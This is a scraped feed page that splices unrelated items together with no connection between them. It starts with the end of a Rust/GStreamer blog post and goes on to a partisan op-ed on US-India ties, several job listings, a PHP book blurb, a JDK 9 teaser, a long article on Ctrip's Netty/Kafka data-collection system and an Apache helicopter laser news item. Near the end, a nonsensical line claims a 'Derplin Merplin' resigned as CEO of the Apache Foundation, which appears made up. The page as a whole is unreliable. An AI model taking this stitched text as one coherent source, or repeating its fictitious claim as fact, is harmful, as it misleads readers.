With all this we now have a way to let Rust do the reference counting for us and enforce the writability rules of the GStreamer API automatically without leaving any chance of doing things wrong. Compared to C where you have to do the reference counting yourself and could accidentally try to modify a non-writable (reference count > 1) object (which would give an assertion), this is a big improvement.

And as a bonus this is all completely without overhead: all that is passed around in the Rust code is (once compiled) the raw C pointer of the objects, and the functions calls directly map to the C functions too. Let’s take an example:

// This gives a GstRc
let mut buffer = Buffer::new_from_vec(vec![1, 2, 3, 4]).unwrap();

{ // A new block to keep the &mut Buffer scope (and mut borrow) small
  // This would fail (return None) if the buffer was not writable
  let buffer_ref = buffer.get_mut().unwrap();
  buffer_ref.set_pts(Some(1));
}

// After this the reference count will be 2
let mut buffer_copy = buffer.clone();

{
  // buffer.get_mut() would return None, the below creates a copy
  // of the buffer instead, which makes it writable again
  let buffer_copy_ref = buffer.make_mut().unwrap();
  buffer_copy_ref.set_pts(Some(2));
}

// Access to Buffer functions that only require a &mut Buffer can
// be done directly thanks to the Deref trait
assert_ne!(buffer.get_pts(), buffer_copy.get_pts());

After reading this code you might ask why DerefMut is not implemented in addition, which would then do make_mut() internally if needed and would allow getting around the extra method call. The reason for this is that make_mut() might do a (expensive!) copy, and as such DerefMut could do a copy implicitly without the code having any explicit indication that a copy might happen here. I would be worried that it could cause non-obvious performance problems.

The last change I’m going to write about today is that the repository was completely re-organized. There is now a base crate and separate plugin crates (e.g. gst-plugin-file). The former is a normal library crate and contains some C code and all the glue between GStreamer and Rust, the latter don’t contain a single line of C code (and no unsafe code either at this point) and compile to a standalone GStreamer plugin.

The only tricky bit here was generating the plugin entry point from pure Rust code. GStreamer requires a plugin to export a symbol with a specific name, which provides access to a description struct. As the struct also contains strings, and generating const static strings with ‘\0’ terminator is not too easy, this is still a bit ugly currently. With the upcoming changes in GStreamer 1.14 this will become better, as we can then just export a function that can dynamically allocate the strings and return the struct from there.

All the boilerplate for creating the plugin entry point is hidden by the plugin_define!() macro, which can then be used as follows (and you’ll understand what I mean with ugly ‘\0’ terminated strings then):

plugin_define!(b"rsfile\0",
               b"Rust File Plugin\0",
               plugin_init,
               b"1.0\0",
               b"MIT/X11\0",
               b"rsfile\0",
               b"rsfile\0",
               b"https://github.com/sdroege/rsplugin\0",
               b"2016-12-08\0");

As a side-note, handling multiple crates next to each other is very convenient with the workspace feature of cargo and the "build --all", "doc --all" and "test --all" commands since 1.16.


          Turning the U.S.-India Alignment into an Alliance   

"Our robust strategic partnership is such that it touches upon almost all areas of human endeavor....We consider the USA as our primary partner for India's social and economic transformation in all our flagship programs and schemes," proclaimed Indian Prime Minister Narendra Modi on June 26. The venue was the joint press conference with President Donald Trump following their lengthy meeting at the White House. This is a sentiment that America must strengthen and build upon to contain the expanding ambitions of China.

Of course, diplomatic niceties prevented any actual public mention of the Communist regime as a common threat to the world's two largest democracies. Nor was China's ally Pakistan mentioned, even as the two leaders talked about defeating terrorism in the region. President Trump noted "Both our nations have been struck by the evils of terrorism, and we are both determined to destroy terrorist organizations and the radical ideology that drives them. We will destroy radical Islamic terrorism." In the case of India, terrorism has been linked directly to Pakistan which has been supporting an insurgency in Kashmir ever since that Muslim province was incorporated into India when the British Raj was partitioned in 1947.

Pakistan was founded as an Islamic state with the mission to unite all Muslims in the region. India was founded on a more tolerant, multicultural democratic standard and counts 175 million Muslims among its 1.3 billion citizens. It must be remembered that it was Pakistan that blocked a UN plebiscite on Kashmir's fate because it feared too many Muslims would vote to live in the more attractive society of India than in a militant regime. Pakistan failed in its bid to seize control of Kashmir but has continued to stir up jihadist movements in the province. Vice President Mike Pence, speaking to the U.S.-India Business Council on June 27, mentioned how "barbarians have struck on Indian soil too many times over the decades, including the horrific attacks in Mumbai nearly a decade ago, claiming the lives of more than 160 innocents, including six Americans." That attack was traced to Pakistan. Hours before Modi's arrival, the State Department imposed sanctions on Syed Salahuddin, the Pakistan-based leader of Hizbul Mujahideen, the main Kashmir terrorist group.

PM Modi stated, "Fighting terrorism and doing away with the safe shelters, sanctuaries, and safe havens will be an important part of our cooperation," clearly with Pakistan in mind; not only regarding Kashmir, but also Afghanistan. The U.S. and its coalition (which includes India, for whose contributions President Trump thanked Modi) cannot end the war in Afghanistan as long as the Taliban (and now ISIS) can lick their wounds and rebuild their forces in Pakistan; free to cross the border at times of their own choosing. 

The threat from China was alluded to when President Trump mentioned how Indian forces "will join together with the Japanese navy to take part in the largest maritime exercise ever conducted in the vast Indian Ocean." What links Japan and India is concern over Beijing's expansion across the Pacific Rim and into the Indian Ocean. Beijing's ambitious "Belt and Road" development initiative, which is designed to impose a "common destiny" on Eurasia, is opposed by both India and Japan. The Chinese plan will build on programs that have already been underway in Pakistan and Sri Lanka, posing direct threats to Indian security.

The U.S. and Japan can and must counter the Chinese initiative by increasing their role in developing the Indian economy, which can truly be a "win-win" relationship. China's rise has been fueled by short-sighted American business firms willfully ignorant of the true nature of the Beijing regime. They have transferred technology and production capacity to a strategic rival of their home country. The pursuit of private profit without adequate supervision by a Washington establishment blinded by naive liberal hopes and corrupted by corporate cash has helped to create a threat Americans will have to face for decades to come. It would be a much better world if all the Western capital sent to China had gone to India instead. Trade is properly conducted among friends, not adversaries where the "gains from trade" are used to create menacing capabilities.

With the world's largest population, India presents a massive market for American goods of all kinds. President Trump, however, concentrated his remarks on energy and security. We are "looking forward to exporting more American energy to India as your economy grows, including major long-term contracts to purchase American natural gas." To the extent that imported gas replaces Indian coal, it will help New Delhi clean up the air pollution that makes its cities look as bad as those in China. VP Pence added nuclear power and clean coal to the list of energy sources the U.S. could help New Delhi develop. President Barack Obama had carried his "war on coal" overseas with a ban on any U.S. aid to the Indian coal industry. But India is not going to abandon its massive coal reserves; their use can, however, be improved.

Modernizing India's military is central to the strategic alignment. VP Pence mentioned to the USIBC that "the United States will sell Sea Guardian UAVs, Apache attack helicopters, and C-17 transports to India." A larger program on the table is the sale of 126 fighter jets to India. The Lockheed F-16 "Viper" is the leading candidate, but the Saab JAS-39 "Gripen" is also in the running, though a strategic link to Sweden makes little sense in an Asian setting. India, however, is moving from being a consumer of military hardware to a producer, as any Great Power must do. Modi has a "make it in India" policy and Lockheed is willing to set up an F-16 production line there. The question is whether this will be considered "outsourcing" by the Trump administration. It should not be as long as the production is for Indian service and does not replace jobs in U.S. industry supplying the Pentagon. The F-16 is long out of production for the USAF. The new F-35 "Lightning II" is coming into service (also built by Lockheed).

Indian production should be seen as "market extension" which will create additional work for American factories and maintenance services, not only for this order of warplanes but for future orders of military equipment of many kinds as the strategic relationship deepens. It should be noted that the first European production line for the F-16 opened in 1978; so India is not asking for anything novel.

The need to offer "co-production" to win military contracts is a subject not often discussed in public debates over arms sales, but it is a part of many transactions. Offset arrangements can also involve local purchasing, subcontracting, investment, and technology-transfer requirements on U.S. exporters that benefit foreign firms in the purchasing country. The U.S. defense industry is the world's leader, but its comparative advantage does not yield the full returns economic textbooks promise because of real world practices like offsets. These are negotiated between foreign governments and corporations in virtually every deal. The state authorities have the greater leverage, as it is generally a buyer's market; but strategic considerations also play their part. Our officials must keep a close eye on such deals to keep a proper balance between risks and rewards to the U.S. defense industrial base.

India's offset requirements have been at the low end of the international scale. Caught between two allied nuclear powers, China and Pakistan, New Delhi needs to modernize its forces; but it also needs a domestic industrial infrastructure to support its armed services. This is why offsets, though generally banned in the commercial sector under the World Trade Organization, are allowed for national security reasons. What is truly important cannot be left to the "invisible hand"--- which means the hands of others.

President Trump and Prime Minister Modi are both nationalists in a dangerous world. As Modi put it, "I am sure that the convergence between my vision for a 'new India' and President Trump's vision for 'making America great again' will add new dimensions to our cooperation." Let us work to make it so in a positive way.



          Sr. Software Engineer - ARCOS LLC - Columbus, OH   
Oracle, PostgreSQL, C, C++, Java, J2EE, JBoss, HTML, JSP, JavaScript, Web services, SOAP, XML, ASP, JSP, PHP, MySQL, Linux, XSLT, AJAX, J2ME, J2SE, Apache,...
From ARCOS LLC - Tue, 13 Jun 2017 17:31:59 GMT - View all Columbus, OH jobs
          PHP Developer - TORRA INTERNATIONAL - Malappuram, Kerala   
Maintain and manage the general network setup. Configure and maintain the Apache and PHP programming environment.... ₹15,000 a month
From Indeed - Tue, 04 Apr 2017 03:57:40 GMT - View all Malappuram, Kerala jobs
          Mastering PHP 7   

Effective, readable, and robust code in PHP.

About This Book: Leverage the newest tools available in PHP 7 to build scalable applications. Embrace serverless architecture and the reactive programming paradigm, which are the latest additions to the PHP ecosystem. Explore dependency injection and implement design patterns to write elegant code.

Who This Book Is For: This book is for intermediate level developers who want to become masters of PHP. Basic knowledge of PHP is required across areas such as basic syntax, types, variables, constants, expressions, operators, control structures, and functions.

What You Will Learn: Grasp the current state of the PHP language and the PHP standards. Effectively implement logging and error handling during development. Build services through SOAP, REST and Apache Thrift. Get to know the benefits of serverless architecture. Understand the basic principles of reactive programming to write asynchronous code. Practically implement several important design patterns. Write efficient code by executing dependency injection. See the working of all magic methods. Handle the command-line tools and processes. Control the development process with proper debugging and profiling.

In Detail: PHP is a server-side scripting language that is widely used for web development. With this book, you will get a deep understanding of the advanced programming concepts in PHP and how to apply them practically. The book starts by unveiling the new features of PHP 7 and walks you through several important standards set by the PHP Framework Interop Group (PHP-FIG). You'll see, in detail, the working of all magic methods, and the importance of effective PHP OOP concepts, which will enable you to write effective PHP code. You will find out how to implement design patterns and resolve dependencies to make your code base more elegant and readable. You will also build web services alongside microservices architecture, interact with databases, and work around third-party packages to enrich applications. This book delves into the details of PHP performance optimization. You will learn about serverless architecture and the reactive programming paradigm that found its way into the PHP ecosystem. The book also explores the best ways of testing your code, debugging, tracing, profiling, and deploying your PHP application. By the end of the book, you will be able to create readable, reliable, and robust applications in PHP to meet modern day requirements in the software industry.

Style and approach: This is a comprehensive, step-by-step practical guide to developing scalable applications using PHP 7.1.

You can download the example code files for all Packt books you have purchased from your account at http://www.PacktPub.com. If you purchased this book elsewhere, you can visit http://www.PacktPub.com/support and register to have the code files.


          JDK 9: Creating a Java Runtime Image With Maven   

At the moment, JDK 9 is only available as Early Access (EA) to let the community take a look at how it works and what can be improved. Apart from all the news, for example about the modular system Jigsaw, there is one important question:

How can I create a Java runtime image with Maven? Before we can begin, let's do a quick recap of runtime images.


          Ctrip's User Data Collection and Analysis System   

[About the author] Wang Xiaobo is a senior engineer in the framework R&D department of Ctrip's technology center, mainly responsible for designing and developing the user behavior data collection system and related data products. He previously worked on internet advertising and RTB-related systems. This article is based on his talk at the Ctrip tech salon "Mobile Development Engineering Practice and Performance Optimization".


I. Design practice of Ctrip's real-time user data collection system

With the rise of the mobile internet in recent years, smartphones, pads and other mobile devices - convenient and efficient - have swept the globe, and the rapid growth of all kinds of apps has further lowered the barrier to mobile internet access, so more and more users are moving from traditional PCs to mobile devices. Traditional user data collection systems based on PC websites and access logs can no longer meet the needs of real-time user behavior analysis, real-time traffic statistics and location-based services (LBS).

Addressing the shortcomings of traditional collection systems in latency, throughput and device coverage, we analyzed what a user data collection system needs against the background of surging mobile traffic, studied how to collect user data efficiently and in real time across multiple client types and network types, and on that basis designed and implemented a real-time, ordered and robust user data collection system. It is built on the Java NIO network framework Netty and the distributed message queue Kafka for storage, and offers real-time operation, high throughput and good generality.

1. Technology selection and design:

A typical data collection, analysis and statistics platform processes data in five main steps:

Figure 1: Data platform processing flow

Of these, data collection is the core problem: whether the collected data is rich, accurate and real-time directly determines how useful the whole analysis platform is. This article focuses on three of the steps: data collection, data transmission, and data modeling and storage.

To meet the collection service's requirements for real-time behavior, efficiency, high throughput and security, and to benefit from some excellent open-source solutions in the big-data industry, the entire system is designed and implemented on the Java technology stack. The overall architecture of the platform is shown below:

Figure 2: System architecture of the data collection and analysis platform

The platform consists of five parts. The client data collection SDK sends data to the Mechanic (UBT-Collector) servers over HTTP(S)/TCP/UDP, choosing a strategy appropriate to the network environment. After a series of processing steps, the servers write the collected data asynchronously into the Hermes (Kafka) distributed message queue system. To correlate server-side business events and logs, business servers obtain the user identifier generated uniformly by the client SDK (C-GUID) and then write their own business events and logs asynchronously into Hermes (Kafka) as well. Finally, the data consumption and analysis platforms consume the collected data from Hermes (Kafka) for real-time or offline analysis. Mechanic (UBT-Collector) also monitors both the collected data and itself; the monitoring information is first written to an HBase cluster and then shown in real time on a dashboard.

(1) A network service based on NIO and Netty

To meet the requirements of high throughput, high concurrency and multi-protocol support mentioned above, we evaluated several open-source asynchronous IO network components (Netty, MINA, xSocket), compared their performance against the Nginx web server, and chose Netty as the network component of the collection service. Briefly: Netty is a high-performance, asynchronous, event-driven NIO framework supporting TCP, UDP and file transfer. All of Netty's IO operations are asynchronous and non-blocking; through its Future-Listener mechanism, callers can either actively fetch IO results or be notified of them.

Figure 3: Internal component structure of the Netty framework

Netty's strengths:

a. Rich functionality: multiple built-in codecs and support for many network protocols.

b. High performance: compared with other mainstream NIO frameworks, its overall performance is the best.

c. Good extensibility: network handling can be flexibly extended through the ChannelHandler components it provides.

d. Ease of use: the API is simple.

e. Battle-tested in many commercial applications, with successful use across the internet, online gaming, big data and telecom software industries.

Netty follows a typical three-layer network architecture:

Figure 4: Netty's three-layer logical network architecture

Layer 1: the Reactor communication scheduling layer. Its job is to listen for connections and read/write operations, read network data into in-memory buffers, and trigger the various network events - connection created, connection active, read events, write events - into the Pipeline, whose chain of responsibility performs the subsequent processing.

Layer 2: the Pipeline (chain of responsibility) layer. It propagates events through the chain in order, forward and backward, and allows the chain to be orchestrated dynamically. A Pipeline can choose to listen for and handle the events it cares about.

Layer 3: the business logic layer, usually one of two kinds: a. pure business logic, such as logging or order processing; b. application-layer protocol management, such as HTTP(S) or FTP.

We know the main factors affecting network service performance are: the network I/O model, the thread (process) scheduling model and the data serialization method.

For the network I/O model, Netty uses a non-blocking I/O implementation built on the JDK NIO Selector.

For thread scheduling, Netty adopts the Reactor thread model. Three Reactor thread models are in common use:

a. Single-threaded Reactor: all I/O operations are performed on one NIO thread. Adequate for small-capacity scenarios.

b. Multi-threaded Reactor: differs from the single-threaded model mainly in that a pool of NIO threads handles I/O. Used for high-concurrency, high-volume scenarios.

c. Master-slave Reactor: the server no longer accepts client connections on a single NIO thread but on a dedicated NIO thread pool, which solves the problem of a single accept thread being unable to serve all client connections. Netty's thread model is not fixed; it can support all three Reactor models (see the sketch below).
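
As a hedged illustration of the master-slave Reactor model - standard Netty 4 bootstrapping with separate boss and worker event loop groups, not Ctrip's actual collector code:

import io.netty.bootstrap.ServerBootstrap;
import io.netty.channel.ChannelFuture;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioServerSocketChannel;

public class CollectorServer {
    public static void main(String[] args) throws InterruptedException {
        EventLoopGroup boss = new NioEventLoopGroup(1);   // accepts connections
        EventLoopGroup workers = new NioEventLoopGroup(); // handles I/O for accepted channels
        try {
            ServerBootstrap b = new ServerBootstrap();
            b.group(boss, workers)
             .channel(NioServerSocketChannel.class)
             .childHandler(new ChannelInitializer<SocketChannel>() {
                 @Override
                 protected void initChannel(SocketChannel ch) {
                     // codecs and business handlers would be added to the pipeline here
                 }
             });
            ChannelFuture f = b.bind(8080).sync();
            f.channel().closeFuture().sync();
        } finally {
            boss.shutdownGracefully();
            workers.shutdownGracefully();
        }
    }
}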

For data serialization, the main factors affecting performance are:

a. the size of the serialized stream (network bandwidth usage);

b. the cost of serialization and deserialization operations (CPU usage);

c. behavior under concurrent calls: stability, linear scaling, and so on.

Netty ships with support for the Google Protobuf binary serialization framework, but by extending Netty's codec interfaces other high-performance serialization frameworks can be plugged in, for example Avro or Thrift compact binary codecs.

Our analysis of the Netty framework and the comparative tests (see the feasibility report below) indicate that a Netty-based collection service can solve the hard problems of high data throughput and real-time collection.

(2) Client-side data encryption, decryption and compression

Sensitive collected data must be encrypted in transit. The standing problem is that client collection code is easy for anonymous users to obtain and decompile (e.g. Android, JavaScript), so the encryption algorithm and key can be stolen, making data security hard to guarantee. Depending on whether the ciphertext can be decrypted, algorithms fall into reversible encryption and irreversible (one-way) encryption. The classification is as follows:

Figure 5: Classification of encryption algorithms

Keys: for reversible encryption, the key is a parameter of the algorithm. Symmetric encryption uses the same key for encryption and decryption; asymmetric encryption splits the key into a public key for encryption and a private key for decryption. The private key is never published or transmitted and is held only by the communicating parties, whereas the public key may be openly distributed. Asymmetric keys also enable digital signatures: sign with the private key, verify with the public key, which provides identity authentication.

Given the nature of the collection clients, symmetric encryption of the collected data is clearly the right choice; the crux is keeping the symmetric key safe. The schemes under consideration are:

a. Put the key inside compiled .so files shipped with the app; for JavaScript collection, write the key-producing algorithm in C and translate it to JavaScript with Emscripten. This obfuscates reasonably well and makes it harder for an eavesdropper to recover the symmetric key.

b. Keep the key on the server: before sending data, fetch the encryption key over HTTPS, then encrypt and send the collected data.

c. The client and the server both hold a copy of a public key. The client generates a symmetric key K (random and short-lived), encrypts the authentication content (UID+K) with the public key and sends it to the server; the server decrypts it with the private key, recovering the UID and the symmetric key K. From then on the client encrypts all collected data with the K held in memory, and the server looks up the matching K by UID to decrypt.

These three approaches essentially solve the problem of securely transmitting client-collected data. A sketch of scheme (c) follows.
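
A minimal JCE sketch of scheme (c) - key sizes, cipher transformations and the UID handling are illustrative assumptions, not Ctrip's actual implementation:

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.util.Base64;

public class HybridHandshake {
    public static void main(String[] args) throws Exception {
        // Server key pair; the client ships with the public half
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        KeyPair server = kpg.generateKeyPair();

        // Client side: generate a short-lived symmetric key K ...
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128);
        SecretKey k = kg.generateKey();

        // ... and send UID+K encrypted under the server's public key
        Cipher rsa = Cipher.getInstance("RSA/ECB/PKCS1Padding");
        rsa.init(Cipher.ENCRYPT_MODE, server.getPublic());
        String uidAndKey = "some-uid:" + Base64.getEncoder().encodeToString(k.getEncoded());
        byte[] handshake = rsa.doFinal(uidAndKey.getBytes("UTF-8"));

        // Server side: recover UID and K with the private key;
        // subsequent payloads are encrypted symmetrically with K
        rsa.init(Cipher.DECRYPT_MODE, server.getPrivate());
        System.out.println(new String(rsa.doFinal(handshake), "UTF-8"));
    }
}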

Compression of collected data: to save traffic and bandwidth and transmit client data efficiently, a fast algorithm with a high compression ratio is needed; we currently consider standard GZIP and a customized LZ77.

(3) Data storage based on Ctrip's distributed message middleware Hermes

Hermes is designed and developed in-house at Ctrip on top of the open-source message middleware Kafka. The overall architecture:

Figure 6: Overall architecture of the Hermes message queue

Hermes offers three storage types:

a. MySQL, suitable for moderate or lower message volumes with strong message-governance requirements.

b. Kafka, suitable for large message volumes.

c. Broker distributed file storage (extending Kafka with customized storage features).

Since the collection service's message volume is very large, the collected data is stored in Kafka. Kafka is a distributed publish/subscribe messaging system. It satisfies the collection service's requirements of high throughput, high concurrency and real-time analysis, with these notable properties:

a. Message persistence in O(1) time, maintaining constant-time access even over terabytes of data.

b. High throughput: even on very cheap commodity machines, a single node can move 100K+ messages per second.

c. Partitioning of messages across Kafka servers and distributed consumption, while keeping the messages within each partition in order.

d. Support for both offline and real-time data processing.

e. Scale out: online horizontal scaling.

A typical Kafka cluster contains several producers (front-end collected data, server logs, system CPU and memory metrics, and so on), several brokers (Kafka scales horizontally; more brokers generally give higher cluster throughput), several consumer groups, and a Zookeeper cluster. Kafka manages cluster configuration through Zookeeper, elects leaders, and rebalances when consumer groups change. Producers push messages to brokers; consumers subscribe to brokers and pull messages to consume. The topology:

Figure 7: Kafka topology

We know that collecting and storing a client's user data in order matters a great deal for downstream consumption and analysis, yet guaranteeing message ordering in a distributed environment is very hard. The Kafka queue cannot guarantee global message ordering, but it does guarantee ordering within each partition. For user data collection and analysis we mainly care that each individual user's data is ordered: if the collection servers route one user's data to one Kafka partition, that user's data will be ordered, which essentially solves the ordering problem (see the producer sketch below).
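
A sketch of how per-user ordering falls out of keyed partitioning with the standard Kafka Java client - the topic name and configuration values are placeholders:

import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.ProducerRecord;
import java.util.Properties;

public class UserEventProducer {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "kafka1:9092");
        props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");

        try (KafkaProducer<String, String> producer = new KafkaProducer<>(props)) {
            // Same key -> same partition -> per-user ordering preserved
            String userId = "c-guid-123";
            producer.send(new ProducerRecord<>("ubt.events", userId, "{\"page\":\"p1023\"}"));
            producer.send(new ProducerRecord<>("ubt.events", userId, "{\"page\":\"p1201\"}"));
        }
    }
}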

(4) Disaster-recovery storage based on the Avro format

When the network is badly disrupted or the Hermes (Kafka) message queue fails, user data must fall back to disaster-recovery storage; the current plan is local file storage in the Avro format. Avro is a serialization framework that converts data structures or objects into a form convenient to store or transmit; it was designed from the start to support data-intensive applications and suits large-scale data storage and exchange, remote or local.

Avro defines a simple object container file format. A file corresponds to one schema, and every object stored in the file is written according to that schema. Objects are stored in blocks separated by synchronization markers, and blocks may be compressed. A file consists of two parts, a header and one or more data blocks, laid out as follows:

Figure 8: Avro object container file format

The disaster-recovery flow: when the network fails or Hermes (Kafka) is down, collected user data is parsed, converted to Avro and serialized straight into local disk files, split into one file per Kafka topic with a new file started automatically every hour. Once the network or Hermes (Kafka) recovers, a background thread reads the Avro files from disk and writes the data into the corresponding topic and partition of the Hermes (Kafka) queue; after a file has been written successfully, its disaster-recovery copy is deleted automatically. This makes the user data collection service markedly more robust and fault tolerant.
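
A sketch of such an hourly fallback writer using Avro's object container files - the schema and file naming are invented for illustration:

import org.apache.avro.Schema;
import org.apache.avro.file.DataFileWriter;
import org.apache.avro.generic.GenericData;
import org.apache.avro.generic.GenericDatumWriter;
import org.apache.avro.generic.GenericRecord;
import java.io.File;
import java.io.IOException;

public class AvroFallback {
    public static void main(String[] args) throws IOException {
        Schema schema = new Schema.Parser().parse(
            "{\"type\":\"record\",\"name\":\"Event\",\"fields\":[" +
            "{\"name\":\"uid\",\"type\":\"string\"}," +
            "{\"name\":\"payload\",\"type\":\"string\"}]}");

        // One file per Kafka topic, rolled hourly in the design described above
        File out = new File("ubt.events.2017060910.avro");
        DataFileWriter<GenericRecord> writer =
            new DataFileWriter<>(new GenericDatumWriter<GenericRecord>(schema));
        writer.create(schema, out);

        GenericRecord rec = new GenericData.Record(schema);
        rec.put("uid", "c-guid-123");
        rec.put("payload", "{\"page\":\"p1023\"}");
        writer.append(rec); // blocks are separated by sync markers in the file
        writer.close();
    }
}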

2. Feasibility analysis of the architecture

On identically configured test servers (collection servers plus a Hermes (Kafka) cluster) we ran the following comparative tests, using Apache Benchmark (ab) as the web load-testing tool:

(1) Netty vs. Nginx request handling

With no business processing of the collected data (accept the request and respond only; no processing, no storage of the collected data), both reach 40,000+ requests per second at 5,000 concurrent connections in keep-alive mode, with Nginx consuming somewhat less CPU and memory. Test parameters: ab -k -n 10000000 -c 5000. The comparison results:



(2) Netty with business processing of the collected data

Adding the parsing of collected data to the Netty service, plus the write of the processed data into the Hermes (Kafka) message queue, allows a simple indirect estimate. If the collection service must handle about 30,000 requests per second with 99% of requests completing in under 800 ms, then the parse-and-store path must finish within 600 ms. Those two steps, parsing and storage, can each be load-tested separately, and our load tests show that both fully meet the performance requirement.

The comparative tests above indicate that collecting and parsing data with a Netty service and writing it directly into the Hermes (Kafka) distributed message queue is, at first pass, a feasible design.

II. The companion data-analysis products

On top of the user data and system-monitoring data collected in real time, we built a suite of analysis products, covering: (1) API and page-performance reports; (2) page visits and traffic; (3) user-behavior analysis; (4) crash and exception analysis; (5) real-time data query tools; (6) collection troubleshooting tools; (7) others. The detailed breakdown:



Figure 9: classification of the data-analysis products

A few of the more common products, briefly:

1. Single-user browsing trace

Purpose: trace a user's browsing in real time, helping product teams streamline page flows and helping support staff localize user problems.

Example: given a user's unique client-side identifier (phone number, email, registered username, ClientId, VisitorId, etc.), query the sequence of pages the user visited in a time window, with each page's visit time and dwell time. If the user hit a crash and exited while browsing, the crash report can be joined in for the related details.

2. Page conversion rate

Purpose: view each page's traffic and conversion in real time, to analyze page user experience and layout problems.

Example: the user first configures a browsing path, e.g. p1023 -> p1201 -> p1137 -> p1300, then queries conversion along that path over a time window. If 14,000 users entered page p1023 and 1,400 of them went on to the next page p1201, the conversion rate into p1201 is about 10%. That is the simplest conversion rate; there is also an indirect one that matches only the first and last pages' traffic. Results can be filtered along many dimensions: network, carrier, country, region, city, device, operating system, and so on.

3. User flow

Purpose: understand each page's relative audience, the relative traffic and exit rates between pages, and relative page traffic along each dimension.

Example: pick the dimensions and time window, and obtain, along the path from the first page to the Nth, each page's visits and unique sessions, where each page's users flow next, and how many drop off at each page.

4. Click heat map

Purpose: find the modules or regions users click most, infer user preferences, identify which regions or modules of a page draw the most effective clicks, support A/B tests comparing click distributions across pages, and guide improvements to interaction and user experience.

Example: the heat-map viewer covers both Web and app. Metrics include raw clicks (total raw clicks on the selected element), per-pageview clicks (effective clicks on the selected element; multiple clicks within one pageview count once), and unique-visitor clicks (effective clicks; multiple clicks by the same user count once).

5. Collection validation testing

Purpose: quickly test whether data is being collected normally, whether volumes look right, and whether the collected data meets requirements.

Example: the user scans the QR code on the tool page with the Ctrip app to register their identity; thereafter, as they use the app normally, the collected data is categorized and displayed on the tool page in real time for side-by-side validation.

6. System performance reports

Purpose: monitor the performance of the system's service calls (SOA services, RPC calls, etc.), page-load performance, app start-up time, LBS positioning, the native-crash ratio, the JavaScript-error ratio, and so on, with hourly reports of per-service latency, success rate and call counts.

With the rich automatic instrumentation data from the collection SDKs across front-end platforms (iOS, Android, Web, Hybrid, React Native, mini-programs), we can analyze data, users and systems along many dimensions, in service of the product and user experience, retention, conversion, and new-user acquisition.

Reprinted from 36 Big Data (36dsj.com): Ctrip's user data collection and analysis system. Please credit 36dsj.com when reprinting.


          US tests Apache helicopters with mounted laser beams   
An Apache helicopter has successfully acquired and hit an unmanned target with a laser gun for the first time in history. Mounted on an Apache AH-64 attack helicopter, the high energy laser tracked and directed energy on the stationary target which was a little less than a mile away. The achievement proves that laser weapons are...
          Python Full-Stack Web Developer DevOps Software Engineer Agile Trading / Joseph Harry Ltd / New York, NY   
Joseph Harry Ltd/New York, NY

Python Full-Stack Web Developer (Software Engineer Python Apache Tom Cat IIS DevOps ChatOps Microservices Micro Services CI CD Bamboo BitBucket DDD ClojureScript Docker Chef Jenkins Agile Digital Trading Banking) required by our trading software client in New York City, New York.

You MUST have the following:

Good experience as a full-stack Software Engineer/Developer for Python web applications

HTML 5, CSS 3, JavaScript for Front End development

Web Servers such as Tom Cat or Apache

Agile

The following would be DESIRABLE, not essential:

BitBucket

Microservices or Domain Driven Design (DDD)

ClojureScript

Docker

ChatOps

Contribution to the open-source community- GitHub, Stack Overflow

Continuous integration (Bamboo/Hudson, TeamCity, TFS, MSBuild)

Automated deployment (Chef, Ansible, Octopus)

Configuration management (Puppet, PowerShell DSC)

Role: Python Full-Stack Web Developer/Software Engineer required by my trading software client in New York City, New York. You will join a small Agile team of five developers, spread over the US and Europe, that are extending and improving credit and counterparty risk applications. There will be the continuous development of new features in order to incorporate the constant release of financial regulation into the product suite. This is a micro service application. The suite is web based, built in Python and running on Apache, Tom Cat and MySQL.

In order to incorporate new financial regulation, the team adopts a highly Agile DevOps environment. This results in several releases a day with the use of Bamboo, BitBucket and Confluence for continuous integration, deployment and source control.

The environment is modern and progressive. There will be excellent opportunities to progress in to Lead Developer and Architect roles.

Salary: $100k - $125k + 20% Bonus + Benefits

Employment Type: Permanent
Work Hours: Full Time
Other Pay Info: $100k - $125k + 20% Bonus + 401K

Apply To Job
          Full-Stack Web Developer DevOps Software Engineer Python Agile Trading / Joseph Harry Ltd / New York, NY   
Joseph Harry Ltd/New York, NY

Full-Stack Web Developer (Software Engineer Python Apache Tom Cat IIS DevOps ChatOps Microservices CI CD Bamboo BitBucket ClojureScript Docker Chef Jenkins Agile Digital Trading Banking) required by our trading software client in New York City, New York.

You MUST have the following:

Good experience as a full-stack Software Engineer/Developer for web applications; this can be any language including .NET, Java, PHP, C++, Python

HTML 5, CSS 3, JavaScript for Front End development

An interest in learning Python

Web Servers such as IIS, Tom Cat or Apache

Agile

The following would be DESIRABLE, not essential:

BitBucket

Microservices or Domain Driven Design (DDD)

ClojureScript

Docker

ChatOps

Contribution to the open-source community- GitHub, Stack Overflow

Continuous integration (Bamboo/Hudson, TeamCity, TFS, MSBuild)

Automated deployment (Chef, Ansible, Octopus)

Configuration management (Puppet, PowerShell DSC)

Role:

Full-Stack Web Developer/Software Engineer required by my trading software client in New York City, New York. You will join a small Agile team of five developers, spread over the US and Europe, that are extending and improving credit and counterparty risk applications. There will be the continuous development of new features in order to incorporate the constant release of financial regulation into the product suite. The suite is web based, built in Python and running on Apache, Tom Cat and MySQL. Although this role will be exclusively developing in Python, Python experience is not required. You can have experience in .NET, Java, PHP, C++ or other languages as long as you are happy to work with Python and have web development experience.

In order to incorporate new financial regulation, the team adopts a highly Agile DevOps environment. This results in several releases a day with the use of Bamboo, BitBucket and Confluence for continuous integration, deployment and source control.

The environment is modern and progressive. There will be excellent opportunities to progress in to Lead Developer and Architect roles.

Salary: $100k - $125k + Bonus + Benefits

Employment Type: Permanent
Work Hours: Full Time
Other Pay Info: $100k - $125k + Bonus + 401K

Apply To Job
          Derplin Merplin has resigned from the position of CEO with The Apache Foundation. As their last move they appointed Abdera Apache as CEO   
          SSL (https) on WAMP   
